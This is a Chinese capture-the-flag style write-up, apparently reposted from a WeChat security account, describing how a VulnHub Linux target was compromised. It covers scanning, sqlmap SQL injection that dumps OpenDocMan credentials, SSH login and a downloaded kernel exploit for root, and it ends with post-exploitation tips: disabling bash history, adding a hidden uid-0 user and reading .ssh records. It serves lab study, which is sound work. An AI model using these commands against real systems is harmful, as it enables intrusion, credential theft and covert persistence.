专栏首页信安之路Linux渗透测试

Linux渗透测试

最近发现了一个不错的靶场,里面各种渗透测试的虚拟机,大家可以下载进行尝试学习。还有就是一个漏洞利用存档,可以找到很多我们可以利用的学习的东西。

靶场:

https://www.vulnhub.com

漏洞利用存档:

https://www.exploit-db.com

0x01 信息搜集

  • 首先就是确定我们靶机的目标IP nmap -sP -T5 192.168.0.1/24<!---more--->

通过前面的步骤,我们对目标进行具体的端口扫描以及操作系统识别,发现开启有80,22以及6667端口。 nmap -sV -p- -A -O -T4 192.168.0.170

  • 目录扫描 继续对目标进行敏感目录扫描,御剑等工具都可以。这里我使用KALI的nikto以及dirb命令进行简单的目录扫描。 nikto -host http://192.168.0.170或者dirb http://192.168.0.170

0x02 漏洞发现

访问IP之后的页面,发现并没有什么特别的地方,于是只能查看源代码,点击超链接进行查看。

在链接的地方竟然发现了秘密的地方,于是访问之

此处是一个登录界面,我们可以尝试注册一个用户进行登录,但只是一个游客的形式。

我们注册一个用户进行登录,还有有很多功能的,于是可以进行更多的尝试。

在下面发现OpenDocMan v1.2.7, OpenDocMan是一个功能完整的基于Web的文档管理系统(DMS),于是找找OpenDocMan v1.2.7所公布的一些可以利用的漏洞。

发现可以利用的好几个漏洞,于是先行尝试sql注入。

0x03 漏洞利用

经过简单的测试发现http://192.168.0.170/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user处确实注入。

于是直接拿出神器Sqlmap进行注入。 sqlmap.py -u "http://192.168.0.170/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value --dbs

经过常见的那几个命令我们可以成功的拿到登录名和密码。

sqlmap.py -u "http://192.168.0.170/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value -D jabcd0cs --tables
sqlmap.py -u "http://192.168.0.170/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value -D jabcd0cs -T odm_admin --columns

发现admin表里面没有信息,只能从user表里面提取信息。

sqlmap.py -u "http://192.168.0.170/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value -D jabcd0cs -T odm_user --columns`
sqlmap.py -u "http://192.168.0.170/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value -D jabcd0cs -T odm_user -C "username,password" --dump

我们可以看到已经获取到了数据库的用户名和密码,直接MD5解密就可以ssh登录服务器。

用户名webmin,密码b78aae356709f8c31118ea613980954b,明文为webmin

0x04 权限提升

经过前面端口扫描可以发现,22端口发放着,可以进行ssh连接。ssh webmin@192.168.0.170

     查看权限发现是普通用户的权限,所以得继续进行提权操作。获取到低权限SHELL后我们通常做下面几件事:

  • 检测操作系统的发行版本
  • 查看内核版本
  • 检测当前用户权限
  • 列举Suid文件
  • 查看已经安装的包,程序,运行的服务,过期版本的有可能有漏洞

lsb_release -a查看系统的发行版本

uname -a查看内核版本

我们可以看到此操作系统采用的是Ubuntu 14.04.4 LTS,内核版本是3.13.0-24-generic,首先想到的就是去漏洞库寻找有没有可以用的exploit。

下载漏洞exploit

wget https://www.exploit-db.com/download/37292mv 37292 shell.cgcc -o shell shell.c./shell

附Linux渗透小技巧:

  • bash去掉history记录 export HISTSIZE=0 export HISTFILE=/dev/null
  • Linux添加uid为0的用户 useradd -o -u 0 cnbird
  • 可以翻下 mysql_history .bash_history
  • ls -al 看下root目录下都有什么隐藏目录 例如 .ssh .vnc 等
  • 可以看下 .ssh/下面的ssh连接记录等,也可以看下全局变量文件什么的
  • 通过webshell反弹shell回来之后获取真正的ttyshell python -c 'import pty; pty.spawn("/bin/sh")'

本文分享自微信公众号 - 信安之路(xazlsec),作者:Hello_C

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2017-07-28

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • php 弱类型问题

    php 是一门简单而强大的语言,提供了很多 Web 适用的语言特性,其中就包括了变量弱类型,在弱类型机制下,你能够给一个变量赋任意类型的值。

    信安之路
  • FeiFeiCms 前台逻辑漏洞分析

    该函数直接将 post 的数据传入,则跟进ff_update函数至\Lib\Lib\Model\UserModel.class.php文件

    信安之路
  • 常见的远程执行命令方式整理

    当我们已经获取了远程系统的凭证(明文密码或 hash)时,可以直接通过3389远程登录进去收集信息、进行下一步的渗透,但是这样做的话会在系统上留下我们的操作记录...

    信安之路
  • yii2.0框架多模型操作示例【添加/修改/删除】

    更多关于Yii相关内容感兴趣的读者可查看本站专题:《Yii框架入门及常用技巧总结》、《php优秀开发框架总结》、《smarty模板入门基础教程》、《php面向对...

    砸漏
  • MySQL 高性能表设计规范

    良好的逻辑设计和物理设计是高性能的基石, 应该根据系统将要执行的查询语句来设计schema, 这往往需要权衡各种因素。

    高广超
  • 我的Mac应用清单

    相信大家或多或少都会碰到这种问题:Mac到底有什么好的,同样或者更低的价钱,我可以买一个配置更好的Windows电脑了。首先,Mac系统是基于Unix系统的,因...

    木可大大
  • Qt隐藏系统标题栏,使用自定义标题栏

           今天我们来实现自定义标题栏的实现,这里面用到了布局,鼠标事件重写等知识点,首先还是自定义标题栏的创作,像下面这样,可放大,可缩小,并且随着窗体大小...

    花狗Fdog
  • Spring Cloud构建微服务架构:分布式服务跟踪(抽样收集)【Dalston版】

    通过 TraceID和 SpanID已经实现了对分布式系统中的请求跟踪,而这些记录的跟踪信息最终会被分析系统收集起来,并用来实现对分布式系统的监控和分析功能,比...

    程序猿DD
  • 超越云存储,用一勺蛋白质保存整个图书馆

    写下来的纸张会被焚毁,电脑可能会被黑,DVD可能会无法读取。威胁无处不在,从简单的一盆水到复杂的网络攻击,都有可能让我们的记录化为乌有。

    大数据文摘
  • 不忘初心,砥砺前行|VALSE之行收获

    随着VALSE2019的精彩落幕,SIGAI迎来了建号一周年庆。回顾这365天的时间,我们用130篇优质原创技术文章,与人工智能领域数万的专业人士、学生以及爱好...

    SIGAI学习与实践平台

扫码关注云+社区

领取腾讯云代金券